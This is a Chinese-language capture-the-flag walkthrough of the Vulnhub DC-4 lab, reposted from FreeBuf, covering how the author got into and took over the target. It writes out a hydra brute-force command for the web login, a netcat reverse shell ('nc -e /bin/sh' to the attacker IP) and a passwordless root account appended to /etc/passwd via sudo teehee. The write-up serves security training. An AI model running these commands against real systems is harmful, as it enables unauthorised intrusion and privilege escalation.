Vulnhub靶机DC系列-DC:4
2021-01-13 12:12:38 Author: www.freebuf.com(查看原文) 阅读量:210 收藏

0x0:靶场介绍

靶场名称: DC :4

靶场发布时间:2019-4-7

靶场地址:https://www.vulnhub.com/entry/dc-4,313/

靶场描述:

DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

1x0:环境搭建

VMware虚拟机(桥接模式)

2x0:靶机渗透

获取靶机的IP

nmap -sn 192.168.3.0/24

1610497638_5ffe3e6620fc19df1a689.png!small

使用nmap来查看靶机的端口信息和系统信息等等

1610497715_5ffe3eb327fdd57bc2cd7.png!small?1610497715238

首先去查看80端口的web服务

1610497725_5ffe3ebdd4782a402784d.png!small?1610497725857

没有什么明显的信息就 一个登录页面,使用dirb扫描一下目录

1610497791_5ffe3eff7aa86e5e8a3bf.png!small?1610497791524

没有扫描到什么有用的页面,一些说明文件尝试也没有

对这个登录框进行尝试,sql注入(sqlmap没跑出来),万能密码都尝试一遍,什么都没有(无奈只能暴力破解)

1610499412_5ffe4554445119331bace.png!small?1610499412303

字典使用的/usr/share/wordlists/metasploit/password.lit (时间太长了)

1610499879_5ffe472778ed12400eb73.png!small?1610499879469

burp跑的太慢了,换一个工具

hydra -l admin -P /usr/share/wordlists/metasploit/password.lst -t 4 192.168.3.32 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

1610507383_5ffe647774cad316eb3c4.png!small?1610507383581

终于进入后台了(暴力破解是真的难受)

1610500095_5ffe47ffe9620e85c9852.png!small?1610500096263

3x0:后台篇

命令执行?抓包看一下

1610500157_5ffe483d159e58a18349b.png!small?1610500157069

抓包执行一下命令

1610500247_5ffe4897ecb118a845995.png!small?1610500247976

在看一下权限

1610500297_5ffe48c97bc41b643f2b3.png!small?1610500297499

进行反弹shell,攻击机监听44123端口

nc -lvvp 44123

靶机执行 nc -e /bin/sh 192.168.3.20 44123

1610501007_5ffe4b8f8501bd1d316d5.png!small?1610501007565

4x0:提权篇

用python变换一下交互式shell

1610501141_5ffe4c1527d494fd01bf9.png!small?1610501141106

这个靶机可以用python,为什么DC3不可以...

在www有一个压缩包解压一下

1610501232_5ffe4c70241be05ca4c54.png!small?1610501232069

解压出来是..DC网站的备份

内核版本(没有什么利用价值)1610501500_5ffe4d7c8c5b5726ad2c0.png!small?1610501500560

exp尝试一些,都编译不了

1610502079_5ffe4fbfa58d957f9aa4c.png!small?1610502079637

root权限的命令也没有可以用1610502159_5ffe500f3035a661b8c10.png!small?1610502159230

在jim目录中发现一个类似于字典

1610502249_5ffe5069eccd09bbbb0eb.png!small?1610502250097

ssh爆破 jim sam charles 分别爆破(另外的两个没有爆破出来)

1610502771_5ffe52739f6ef0bad31a3.png!small?1610502771747

用jim账号登录ssh

1610502871_5ffe52d7f230040e123a3.png!small?1610502872018

mbox的内容(邮件内容)

1610502985_5ffe5349ae29c4af84196.png!small?1610502985704

看看系统有没有和mail相关的文件

1610503107_5ffe53c3e9e8f558b8b5b.png!small?1610503108142

存在一份jim的邮件,获取到charles的password(^xHhA&hvim0y)

1610503250_5ffe545290720ce5af451.png!small?1610503251132

切换到charles账户(查看可以使用的root权限命令)

1610503311_5ffe548ff3c1414427f49.png!small?1610503312019

使用teehee命令添加一个root权限的账号

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

su admin 即为root权限

提权成功:

1610503470_5ffe552e91649c11a6b39.png!small?1610503470616

5x0:获得flag

1610503506_5ffe5552559fac165822d.png!small?1610503506471

这个靶场的暴力破解太多了。。。时间太长了


文章来源: https://www.freebuf.com/articles/web/260667.html
如有侵权请联系:admin#unsafe.sh